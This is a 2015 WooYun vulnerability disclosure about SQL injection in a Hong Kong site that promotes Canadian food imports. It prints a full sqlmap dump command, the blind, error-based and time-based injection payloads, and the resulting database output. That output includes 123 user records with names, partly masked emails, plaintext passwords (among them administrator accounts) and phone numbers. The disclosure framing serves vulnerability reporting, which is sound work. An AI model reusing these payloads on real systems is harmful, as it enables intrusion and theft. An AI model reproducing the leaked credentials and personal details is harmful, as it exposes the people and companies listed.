当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151173

漏洞标题:加拿大食品網某處存在SQL插入攻擊(59個表/大量用戶郵箱姓名密碼及電話泄露)(香港地區)

相关厂商:加拿大食品網

漏洞作者: 路人甲

提交时间:2015-11-03 15:06

修复时间:2015-12-19 18:30

公开时间:2015-12-19 18:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

加拿大駐香港總領事館農業組的功能主要為推廣加拿大農業食品到香港及澳門,為香港及澳門的進口商尋找適銷的加拿大食品,配對生意夥伴和提供加拿大農產食品技術及投資訊息。
香港從加拿大進口的農產食品在2013年接近6.7億港元,比2012年增長了27%,是”Quality is in our Nature” -加拿大農產食品優良品質,源自天然的最佳見證。

详细说明:

地址:http://**.**.**.**/trade/detail.php?cr=D&cID=5

python sqlmap.py -u "http://**.**.**.**/trade/detail.php?cr=D&cID=5" -p cID --technique=BET --random-agent --batch -D official_cfhkd -T user -C uEmail,uID,uName,uPassword,uTel --dump

漏洞证明:

---
Parameter: cID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cr=D&cID=5 AND 1405=1405
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cr=D&cID=5 AND (SELECT 5696 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5696=5696,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cr=D&cID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))wJsI)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user:    'u_official_cfhkd@%'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cr=D&cID=5 AND 1405=1405
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cr=D&cID=5 AND (SELECT 5696 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5696=5696,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cr=D&cID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))wJsI)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
database management system users [1]:
[*] 'u_official_cfhkd'@'%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cr=D&cID=5 AND 1405=1405
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cr=D&cID=5 AND (SELECT 5696 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5696=5696,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cr=D&cID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))wJsI)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] official_cfhkd
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cr=D&cID=5 AND 1405=1405
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cr=D&cID=5 AND (SELECT 5696 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5696=5696,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cr=D&cID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))wJsI)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: official_cfhkd
[59 tables]
+--------------------------+
| user                     |
| about_us_organ           |
| about_us_person          |
| company                  |
| company_bk               |
| company_bk2              |
| company_test             |
| contact_us_about_comp    |
| contact_us_dis_channel   |
| coupon                   |
| coupon_bk                |
| coupon_bk2               |
| enquiry                  |
| enquiry_comp_desc        |
| enquiry_comp_dis_channel |
| food_general             |
| food_general_bk          |
| food_general_test        |
| foodcategory             |
| foodcategory_bk          |
| foodcategory_test        |
| health_info              |
| home_slider              |
| news                     |
| news_bk                  |
| news_bk2                 |
| news_bk3                 |
| news_test                |
| paragraphs               |
| product                  |
| product_bk               |
| product_bk2              |
| product_test             |
| promotions               |
| promotions_bk            |
| promotions_bk2           |
| promotions_bk3           |
| promotions_test          |
| recipes                  |
| recipes_bk               |
| recipes_bk2              |
| recipes_bk3              |
| recipes_test             |
| region                   |
| shop                     |
| shop_bk                  |
| shop_bk2                 |
| shop_test                |
| shopproduct              |
| shopproduct_bk           |
| shopproduct_bk2          |
| shopproduct_test         |
| sitemap                  |
| tmp_shop                 |
| useful_links             |
| user_bk1                 |
| user_bk2                 |
| user_test                |
| w                        |
+--------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cr=D&cID=5 AND 1405=1405
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cr=D&cID=5 AND (SELECT 5696 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5696=5696,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cr=D&cID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))wJsI)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: official_cfhkd
Table: user
[9 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| abled     | varchar(5)       |
| uCID      | int(10) unsigned |
| uEmail    | varchar(60)      |
| uID       | int(10) unsigned |
| uLevel    | int(10)          |
| uLogin    | varchar(60)      |
| uName     | varchar(100)     |
| uPassword | varchar(20)      |
| uTel      | varchar(20)      |
+-----------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cr=D&cID=5 AND 1405=1405
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cr=D&cID=5 AND (SELECT 5696 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5696=5696,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cr=D&cID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))wJsI)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: official_cfhkd
Table: user
[123 entries]
+----------------------------------+-----+---------------------------------------------+----------------+------------------+
| uEmail                           | uID | uName                                       | uPassword      | uTel             |
+----------------------------------+-----+---------------------------------------------+----------------+------------------+
| juliana.che@**.**.**.**       | 1   | Juliana Che                                 | 25284729       | 25284729         |
| mandy@**.**.**.**               | 2   | Mandy Wong                                  | 23888233       | 23888233         |
| thomas@**.**.**.**              | 3   | Thomas Yew                                  | 23888233       | 23888233         |
| richard@**.**.**.**            | 4   | Richard S. Chen                             | 23856044       | (852) 2385 6044  |
| pofoods@**.**.**.**             | 5   | Benson Chan                                 | 29848148       | (852) 2984 8148  |
| leslielam@**.**.**.**        | 6   | Leslie Y.H. Lam                             | 27683512       | (852) 2768 3512  |
| viviankwok@**.**.**.**            | 7   | Vivian Kwok                                 | 37412728       | 37412728         |
| vicky_chan@**.**.**.**           | 8   | Vicky K.P. Chan                             | 26803875       | 26803875         |
| calvinfung@**.**.**.**          | 9   | Calvin Fung                                 | 25527128       | 25527128         |
| paulinelai@**.**.**.**             | 10  | Pauline Lai                                 | 25453138       | (852) 2545 3138  |
| kevinhui@**.**.**.**         | 11  | Kevin Hui                                   | 35526260       | (852) 3552 6260  |
| janeng@**.**.**.**           | 12  | Jane Ng                                     | 35526262       | (852) 3552 6262  |
| cynthiachan@**.**.**.**   | 13  | Cynthia Chan                                | 28892213       | (852) 2889 2213  |
| jason@**.**.**.**        | 14  | Jason Willis                                | 21505739       | 21505739         |
| kwjng601@**.**.**.**             | 15  | Johnny Ng                                   | 24771823       | (852) 2477 1823  |
| kiyoshi@**.**.**.**          | 16  | Kiyoshi Caines                              | 25734988       | 25734988         |
| jason@**.**.**.**           | 17  | Jason Leung                                 | 37692378       | (852) 3769 2378  |
| patrick@**.**.**.**               | 18  | Patrick                                     | 22460088       | (852) 2246 0088  |
| viola@**.**.**.**                 | 19  | Viola                                       | 22460088       | (852) 2246 0088  |
| stanley_ng@**.**.**.**           | 20  | Stanley Ng                                  | 29689888       | 29689888         |
| Wilson_Kong@**.**.**.**          | 21  | Wilson Kong                                 | 29689888       | 29689888         |
| peter@**.**.**.**          | 22  | Peter                                       | 34228718       | (852) 3422 8718  |
| polly@**.**.**.**          | 23  | Polly                                       | 34228718       | (852) 3422 8718  |
| eva@**.**.**.**            | 24  | Eva - The Food Source Ltd.                  | 34228718       | (852) 3422 8718  |
| ginseng@**.**.**.**                | 25  | Kim Ming, Chan                              | 25435388       | (852) 2543 5388  |
| dho@**.**.**.**            | 26  | Dennis Ho                                   | 123456         | (852) 2345 6789  |
| [email protected]            | 27  | Melissa Ng                                  | 6042784450     | (604) 278 4450   |
| tungpang-food@**.**.**.**    | 28  | Tung Pang                                   | 24043838       | (852) 2408 3838  |
| shirley.sum@**.**.**.**     | 29  | Shirley Sum                                 | 23116018       | 23116018         |
| denisetam@**.**.**.**      | 30  | Denise                                      | 28388902       | (852) 2838 8902  |
| erin@**.**.**.**                      | 31  | Erin Cheung                                 | 23053858       | 23053858         |
| terence@**.**.**.**                   | 32  | Terence Cheung                              | 23053858       | 23053858         |
| paullam@**.**.**.**              | 33  | Paul Lam                                    | 26062000       | 26062000         |
| lawmanghing@**.**.**.**         | 34  | Mr. Law Mang Hing                           | 24889025       | (852) 2488 9025  |
| mng@**.**.**.**        | 35  | Merlinda Ng                                 | 29114989       | 29114989         |
| jack_lee@**.**.**.**        | 36  | Jack Lee                                    | 28216254       | 28216254         |
| sharon.l@**.**.**.**          | 37  | Sharon Lai                                  | 24815111       | 24815111         |
| fanny@**.**.**.**            | 38  | Fanny So                                    | 27307117       | (852) 2730 7117  |
| cl@**.**.**.**              | 39  | Chole Lee                                   | 28983252       | 28983252         |
| lindaliang@**.**.**.**        | 40  | Linda Liang                                 | 28822347       | 28822347         |
| pwchan007@**.**.**.**           | 41  | Stephen Chan                                | 24889025       | (852) 2488 9025  |
| parktak@**.**.**.**              | 42  | Albert Ng                                   | parktakcanada  | (905) 477 8926   |
| phoebechan@organicla             | 43  | Phoebe Chan                                 | 28506166       | 28506166         |
| rogertiu@**.**.**.**    | 44  | Roger Tiu                                   | rogertiu       | NULL             |
| lilian@**.**.**.**                  | 45  | Lilian Ip                                   | 28810806       | 28810806         |
| raymondchan@**.**.**.**     | 51  | 陳偉龍 Raymond Chan                            | Raymond2012    | +852-5428-7158   |
| mandy@**.**.**.**                  | 52  | Top Administrator                           | cdahk2014      | Not Applicable   |
| subadmin1@**.**.**.**          | 53  | Sub Administrator                           | subadmin1      | Not Applicable   |
| subadmin2@**.**.**.**          | 72  | Sub Administrator                           | subadmin2      | Not Applicable   |
| info@**.**.**.**         | 82  | PERFECT                                     | 748480ykcan    | (852) 3483 5654  |
| honey@**.**.**.**                | 92  | Greg Mohr                                   | 2048170253     | (204) 817 0253   |
| kkhorichard@**.**.**.**          | 102 | Wing Wing Company                           | 6042547241     | (604) 254 7241   |
| beaverlakewine@**.**.**.**         | 112 | Beaver Lake                                 | 51867417       | (852) 5186 7417  |
| info@**.**.**.**              | 122 | D`Angelo Wine Cellar                        | 27303890       | (852) 2730 3890  |
| claudiacheung@**.**.**.**             | 132 | Impex Quality Products Ltd.                 | 35212020       | (852) 3521 2020  |
| cleung@**.**.**.**                | 142 | Yo Bago                                     | 2561-7700      | (852) 2561 7700  |
| nathan_louey@**.**.**.**      | 152 | Telford International Company Limited       | 23152536       | (852) 2315 2536  |
| joseph@**.**.**.**         | 162 | The Big Bite                                | 69799690       | (852) 6979 9690  |
| sales@**.**.**.**               | 172 | Hun Tai (HK) Ltd                            | 24285668       | (852) 2428 5668  |
| cindylo@**.**.**.**           | 182 | Green dot dot                               | 31814488       | (852) 3181 4488  |
| colindung@**.**.**.**     | 191 | Best Way Food International Trading Ltd.    | 35689170       | (852) 3568 9170  |
| hello@**.**.**.**                 | 201 | Joseph Luk                                  | 25467628       | (852) 2546 7628  |
| [email protected]             | 211 | Quebec Mall Limited (HK)                    | 54148745       | (852) 8192 7852  |
| dandhongkong@**.**.**.**       | 221 | Dan-D Pak                                   | 39701833       | (852 ) 3970 1833 |
| avis.lo@**.**.**.**         | 231 | Pacifico Corp                               | 34228328       | (852) 3422 8328  |
| info@**.**.**.**           | 241 | Chubby Charlie                              | 91710688       | (852) 9171 0688  |
| NULL                             | 251 | Thomas Lau                                  | 21563356       | (852) 2156 3356  |
| sara.tsang@**.**.**.**      | 261 | Milon Wine                                  | 39709381       | (852) 3970 9381  |
| germain@**.**.**.**          | 271 | Muwin Estate                                | 6811545        | (902) 681 1545   |
| islandsalt@**.**.**.**             | 281 | Andrew Shepherd                             | 12508824489    | (250) 882 4489   |
| info@**.**.**.**             | 291 | BC Blueberry Council                        | 8642117        | (604) 864 2117   |
| justin@**.**.**.**        | 301 | Northern Divine                             | 8854688        | (604) 885 4688   |
| [email protected]           | 311 | Fruit d‘ Or                               | 3851126        | (819) 385 1126   |
| info@**.**.**.**          | 321 | Canards du lac Brome                        | 2423825        | (450) 242 3825   |
| swells@**.**.**.**                   | 331 | Organic Trade Association                   | 3353423        | (250) 335 3423   |
| pho@**.**.**.**                  | 341 | Windset Farms                               | 0r4pr0n0b15    | (604) 940 7700   |
| mcbergevin@**.**.**.**    | 351 | La Maison Bergevin                          | 6249797        | (418) 624 9797   |
| NULL                             | 361 | Lassonde Industries Inc.                    | 5464399        | (416) 546 4399   |
| evelyn.tang@ClassicFineF**.**.**.** | 362 | Classic Fine Foods (Hong Kong) Ltd.         | 26122066       | (852) 2612 2066  |
| evelyn.tang@ClassicFineF**.**.**.** | 372 | Classic Fine Foods (Hong Kong) Ltd.         | 26122066       | (852) 2612 2066  |
| walterso@**.**.**.**         | 382 | Dai Fung (Asia) Company Limited             | 27905518       | (852) 2790 5518  |
| rickhoward@**.**.**.**     | 392 | R2 Concepts                                 | 98002725       | (852) 9800 2725  |
| NULL                             | 402 | ABCDE                                       | 123456         | NULL             |
| fanny@**.**.**.**              | 412 | Rich One Beauty and Health Products Ltd.    | 27307117       | (852) 2730 7117  |
| el@**.**.**.**              | 422 | Rainbow Assets Ltd.                         | 28983252       | (852) 2898 3252  |
| swissinternationalhk@**.**.**.**   | 432 | Swiss International (Hong Kong) Ltd.        | swissrt8573    | (852) 2515 0660  |
| [email protected]              | 442 | CallingwoodAgri                             | 7783003282     | (778) 300 3282   |
| BMaier@**.**.**.**               | 451 | The Original Cakerie                        | 5153378        | (604) 515 3378   |
| info@**.**.**.**        | 461 | Redwood Health                              | 28152121       | (852) 2815 2121  |
| keith@**.**.**.**             | 471 | BC Fine Foods                               | 24271950       | (852) 2427 1950  |
| scott@**.**.**.**     | 481 | Royal Canadian Water Company Ltd.           | 9003315        | (416) 900 3315   |
| [email protected]                    | 482 | Vieni Estates Inc.                          | 7493655        | (416) 749 3655   |
| paubry@**.**.**.**      | 492 | Coyote`s Run Estate Winery                  | 6828310        | (905) 682 8310   |
| inquiry@**.**.**.**          | 502 | Pelee Island Winery                         | 7336551        | (519) 733 6551   |
| enquiry@**.**.**.**               | 512 | International Fine Foods Ltd.               | 35833366       | (852) 3583 3366  |
| sales@**.**.**.**               | 521 | Frutodor                                    | 27611100       | (852) 2761 1100  |
| admin@**.**.**.**              | 531 | Heylux Company Limited                      | 27963378       | (852) 2796 3378  |
| info@**.**.**.**          | 541 | Target Marine Hatcheries                    | 8854688        | (604) 885 4688   |
| [email protected]                 | 551 | Consolidated Fruit Packers Ltd.             | 8681400        | (250) 868 1400   |
| winsonchan@**.**.**.**    | 561 | Million Gourmet Ltd.                        | 28892213       | (852) 2889 2213  |
| marianaplus@**.**.**.**              | 571 | Mariana Health Foods Inc.                   | 7266046        | (709) 726 6046   |
| info@**.**.**.**               | 581 | L**.**.**.**                               | 20069194       | (852) 2117 0337  |
| info@wilsonf**.**.**.**.hk          | 591 | Wilson International Frozen Foods (HK) Ltd. | 36780888       | (852) 3678 0888  |
| [email protected]                      | 592 | Aliments ED Foods                           | 3511254        | (604) 351 1254   |
| admin@**.**.**.**             | 602 | Groupe Bergeron- Thibault                   | 3733333        | (819) 373 3333   |
| jm.labonte@**.**.**.**        | 612 | Miel Labonte Honey                          | 7583877        | (819) 758 3877   |
| info@**.**.**.**           | 622 | Love Natural Ltd.                           | 35848153       | (852) 3584 8153  |
| aiyanlee@**.**.**.**             | 632 | BC wine                                     | bcwine         | (852) 6958 1240  |
| SonnieN@**.**.**.**               | 642 | Watson‘s Wine                             | 26068828       | (852) 2606 8828  |
| michael.ngan@**.**.**.**       | 652 | Organic Experience Management Group         | 29812888       | (852) 2981 2888  |
| info@**.**.**.**              | 661 | Pure Canada                                 | 9124448        | (514) 912 4448   |
| hongkong@**.**.**.**         | 671 | Syncrotrade                                 | 7888153        | (778) 788 8153   |
| daniel.mencius@**.**.**.**      | 681 | Golden Eagle Aquaculture Inc.               | 6878813        | (604) 687 8813   |
| lee.masoud@**.**.**.**          | 691 | Mondiv                                      | 9790717        | (877) 979 0717   |
| puneet@nanakf**.**.**.**            | 701 | Punjab Milk Foods Inc                       | 5949190        | (604) 594 9190   |
| catherine@**.**.**.**             | 711 | The Chai Company                            | 9409887        | (604) 940 9881   |
| [email protected]                    | 721 | Nature‘s Health Products Canada Corp.     | 2302751        | (800) 230 2751   |
| aschk@**.**.**.**              | 731 | ASC Fine Wines                              | 39236700       | (852) 3923 6700  |
| [email protected]            | 741 | Camus Wines & Spirits                       | 28311509       | (852) 2831 1509  |
| jchen@**.**.**.**            | 751 | Ocean Choice International                  | 34622742       | (852) 3462 2742  |
| patriciahovington@**.**.**.**      | 761 | DeSeve                                      | 4388759950     | (514) 629 8773   |
| ozenimm@**.**.**.**                | 771 | Ozen International Company Limited          | 51397788       | (852) 5139 7788  |
| jnjtrading403@**.**.**.**          | 781 | J&Jtrading                                  | 96461030       | (852) 36461030   |
+----------------------------------+-----+---------------------------------------------+----------------+------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-11-04 18:28

厂商回复:

已將事件通知有關機構

最新状态:

暂无